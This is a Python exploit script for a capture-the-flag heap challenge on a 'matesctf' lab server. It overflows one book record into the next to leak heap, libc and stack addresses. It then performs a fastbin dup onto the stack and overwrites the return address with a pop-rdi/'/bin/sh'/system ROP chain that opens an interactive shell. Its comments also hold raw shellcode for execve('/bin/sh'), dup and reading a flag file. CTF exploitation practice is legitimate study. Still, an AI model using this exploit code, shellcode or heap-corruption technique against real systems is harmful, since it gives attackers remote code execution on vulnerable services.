import sys
sys.path.append("/home/athos/ctf/form")
from customlibpwn import *
global s
#def write_got(system,got_addr,n):
#def virtual_chunk(save_addr,bit=32)
#64bit fmt: printf positional index of a stack slot = (slot offset / 8) + 6, because the first five variadic args are passed in registers
#open-read-write flag 32bit: hflag[H1\xf6VSH\x89\xe7j\x02X\x0f\x05P_U^jAZH1\xc0\x0f\x05H1\xc0H1\xffH\xff\xc7H\xff\xc0\x0f\x05
#32 system=0x468f0 ; binsh=0x17dbc5
#64 system=0x46640 ; binsh=0x17ccdb
#binsh64="\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
#binsh="\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
#sys_dup="\x31\xc9\x6a\x04\x5b\x6a\x3f\x58\xcd\x80\xfe\xc1\x80\xf9\x03\x75\xf4"
#######################################################
# DEBUG PEDA
#######################################################
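# PEDA helper input: a struct description of the challenge's book record so the
# debugger can display heap objects field by field. Written to ./peda-debug in
# the current working directory every time the script is imported or run.
# NOTE(review): `char title; 32 meepwn;` looks like a mangled `char title[32]`
# (the exploit below treats the title as 32 bytes) - confirm against the binary
# before trusting the debugger's rendering of this layout.
# Renamed from `struct` so the module-level name no longer shadows the stdlib
# `struct` module.
PEDA_STRUCT = """
struct_book
{
_DWORD protect;
char title;
32 meepwn;
_DWORD book_size;
char *content;
};
"""
with open("peda-debug", "w") as fh:
    fh.write(PEDA_STRUCT)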
#0x7F0C6 _int_free+422 checkback
#0x7F11B _int_free+507 checknext
#0x7F282 _int_free+507 checknext (same "+507" label as the previous entry; one of the two offsets is stale - recompute before setting breakpoints)
"""b*_int_free
b*_int_free+422
b*_int_free+507
b*_int_free+481
b*_int_free+866
"""
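# GDB/PEDA breakpoint script written to ./peda-cmd in the current working
# directory. The addresses are specific to the challenge binary (non-PIE
# 0x40xxxx text); `fgets+244` is a libc-relative breakpoint.
debug = """
b*fgets+244
b*0x400DD9
b*0x4010E6
b*0x400D6B
"""
filename = ""  # unused; kept so the module namespace is unchanged
with open("peda-cmd", "w") as fh:
    # An earlier version sourced a heap-inspection helper here:
    #   fh.write("source /home/athos/ctf/form/gdbheapload")
    fh.write(debug)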
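def p(m):
    """Pack integer `m` as a little-endian unsigned 64-bit value (8 bytes).

    Calls the stdlib `struct` module directly instead of relying on the
    star-imported `pack`, so the helper is self-contained and its contract
    is explicit.

    Raises struct.error if `m` is outside 0 .. 2**64-1.
    """
    import struct
    return struct.pack("<Q", m)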
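def u(m):
    """Unpack exactly 8 bytes `m` as a little-endian unsigned 64-bit integer.

    Inverse of p(). Uses the stdlib `struct` module directly instead of the
    star-imported `unpack`.

    Raises struct.error if `m` is not exactly 8 bytes long - a truncated leak
    therefore fails loudly rather than yielding a bogus address.
    """
    import struct
    return struct.unpack("<Q", m)[0]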
########################################################
# PWN! PWN! PWN!
########################################################
def add_book(size, title, content):
    """Menu option 1: create a book, answering every prompt and always protecting it.

    Each (prompt, reply) pair below is consumed in order - size, title, content,
    then "y" for the protect question - and the trailing "$>" read leaves the
    connection back at the main menu. `size`, `title` and `content` are sent
    verbatim (plus a newline); nothing is length-checked here.
    """
    dialogue = (
        ("Enter book size:", str(size)),
        ("Enter book title:", title),
        ("Enter book content:", content),
        ("Protect this book? (y/N)", "y"),
    )
    send("1\n")
    for prompt, reply in dialogue:
        recvu(prompt)
        send(reply + "\n")
    recvu("$>")
def del_book(id):
    """Menu option 2: delete book `id`.

    Unlike add_book this does not read the following "$>" prompt; the caller's
    next recvu() reads past it.
    """
    book_id = "".join((str(id), "\n"))
    send("2\n")
    recvu("Enter book id:")
    send(book_id)
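def _read_book(book_id):
    """Menu option 3 ("print book"): show `book_id` and return the raw output up to the next "$>"."""
    send("3\n")
    recvu("Enter book id:")
    send(str(book_id) + "\n")
    return recvu("$>")


def _extract_qword(text, marker, offset):
    """Return the little-endian QWORD located `offset` bytes after the first `marker` in `text`.

    Raises RuntimeError when the marker is missing or fewer than 8 bytes follow
    it. (The original code sliced from index -1 in that case and fed garbage
    to u(), which either raised struct.error or produced a bogus address.)
    """
    idx = text.find(marker)
    if idx < 0:
        raise RuntimeError("leak marker %r not found in: %r" % (marker, text))
    raw = text[idx + offset:idx + offset + 8]
    if len(raw) != 8:
        raise RuntimeError("truncated leak after %r: %r" % (marker, raw))
    return u(raw)


def _fake_book2(content_ptr):
    """Bytes that replace book 2's struct_book: protect=1, 32-byte title, book_size=0x100, content=content_ptr.

    With book_size forced to 0x100, printing book 2 dumps 0x100 bytes starting
    at `content_ptr`, i.e. an arbitrary read.
    """
    return "\x01\x00\x00\x00" + "K" * 32 + "\x00\x01\x00\x00" + p(content_ptr)


def _respray_book1(book2_size, tail):
    """Free book 1 and re-create it with a 0x1f0-byte body that runs past its own chunk.

    The first 0x100 bytes fill book 1's original content; the bytes after that
    overwrite book 2's chunk header (prev_size=0x110, size=`book2_size`) and
    then `tail` (book 2's struct_book, or a fake fastbin fd). The 0x1f0 size and
    the 0x110/0x290/0x1a0 heap offsets used by the caller were tuned for this
    binary's heap layout and are not derived here.
    """
    del_book(1)
    add_book(0x1f0, "A" * 32, "X" * 0x100 + p(0x110) + p(book2_size) + tail)


def _read_qword_at(addr, marker, offset):
    """Arbitrary read: point book 2's content at `addr`, print it, and parse the first QWORD after `marker`."""
    _respray_book1(0x41, _fake_book2(addr))
    return _extract_qword(_read_book(2), marker, offset)


def doexploit(host="lab04.matesctf.org", port=1337):
    """Run the full exploit against `host`:`port` and drop into an interactive shell.

    Stages (each stage's constants are specific to the challenge binary and its
    libc build; the commented-out offset pairs in the gist history show they
    were re-tuned at least once):
      1. unlock menu option 5 with the challenge's fixed pass phrase;
      2. heap leak - overflow from book 1 into book 2's struct so its
         unterminated title runs into the content pointer;
      3. libc leak - rewrite book 2's content pointer to fopen@GOT (0x6020A0;
         the binary appears to be non-PIE, so no binary leak is needed);
      4. stack leak - read a libc pointer into the stack (baselibc+0x3c14a0,
         presumably an environ-style pointer) the same way;
      5. fastbin-dup onto the stack - free a heap address of our choosing,
         plant a fake fd pointing at a fake chunk below the leaked stack
         address, then allocate 0x30 bytes so the next "content" write lands
         on a saved return address and becomes a pop rdi; "/bin/sh"; system ROP.

    Written for Python 2: payloads are str concatenated with the output of
    p(); on Python 3 those would have to become bytes. The print calls and
    literals below are valid under both interpreters.

    Side effects: network I/O via the customlibpwn globals (send/recvu/telnet),
    which presumably share one connection opened by sock(). The socket is
    closed on every exit path, including a failed leak.
    """
    s = sock(host, port)
    try:
        # Stage 1: the pass phrase is a fixed byte string from the challenge;
        # presumably it unlocks the path the rest of the exploit relies on.
        recvu("$>")
        send("5\n")
        recvu("Enter pass phrase:")
        send("\xbbDhQ\xb8\xae" + "\n")
        recvu("$>")

        add_book(0x100, "A" * 30, "1" * 0x90)
        add_book(0x30, "B" * 30, "2" * 0x20)
        add_book(0x20, "C" * 30, "3" * 0x10)

        # Stage 2: heap leak. The 31-byte title plus "AAAA" leaves book 2's
        # title unterminated, so printing it spills into the following fields;
        # the heap pointer sits 0x24 bytes after the "flag" marker in the output.
        _respray_book1(0x41, "\x01\x00\x00\x00" + "K" * 31 + "AAAA")
        heapleak = _extract_qword(_read_book(2), "flag", 0x24)
        heapbase = heapleak - 0x290

        # Stage 3: libc leak through fopen@GOT. All libc offsets below match
        # the target's libc build only.
        fopen = 0x6020A0
        libc = _read_qword_at(fopen, "Content:", 9)
        baselibc = libc - 0x6e410
        system = baselibc + 0x46590
        binsh = baselibc + 0x17c8c3
        # Computed and printed but no longer used: an earlier attempt to reach
        # tls_dtor_list via forward/backward consolidation of a fake chunk did
        # not work and was dropped from the exploit path.
        tls_dtor_list = baselibc + 0x5e26f0
        print("heapbase %s " % hex(heapbase))
        print("leak fopen %s" % hex(libc))
        print("baselibc %s" % hex(baselibc))
        print("system %s" % hex(system))
        print("binsh %s" % hex(binsh))
        print("tls_dtor_list %s" % hex(tls_dtor_list))

        # Stage 4: stack leak via a libc pointer into the stack.
        p_leakstack = baselibc + 0x3c14a0
        stack = _read_qword_at(p_leakstack, "Content:\n", 9)
        print("leakstack: %s" % hex(stack))

        # Stage 5: fastbin dup. Point book 2's content at heapbase+0x1a0 so
        # del_book(2) frees that address as a chunk (the QWORD at +8 there must
        # be a fastbin size for this to pass free()'s checks - found empirically).
        _respray_book1(0x41, _fake_book2(heapbase + 0x1a0))
        # Fake chunk on the stack: addr_stack+8 must hold a value malloc accepts
        # as a 0x40-bin size, and addr_stack+0x10 plus 14 bytes of padding is the
        # saved return address. -0x156-8 is a measured offset for this binary.
        addr_stack = stack - 0x156 - 8
        del_book(2)
        # Overwrite the freed chunk's fd with the stack address (size 0x40 so
        # it stays in the same fastbin).
        _respray_book1(0x40, p(addr_stack))

        prdiret = 0x401243  # pop rdi; ret gadget in the binary
        rop = "A" * (0x30 - 34) + p(prdiret) + p(binsh) + p(system)
        # Not add_book(): the 0x30 allocation returns the stack chunk and the
        # content write clobbers the return address, so the program never gets
        # to the "Protect this book?" prompt - we must not wait for it.
        send("1\n")
        recvu("Enter book size:")
        send(str(0x30) + "\n")
        recvu("Enter book title:")
        send("A" * 30 + "\n")
        recvu("Enter book content:")
        send(rop + "\n")
        print("shell>> ")
        telnet()
    finally:
        s.close()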
doexploit()
# flag :matesctf{null byte corruption}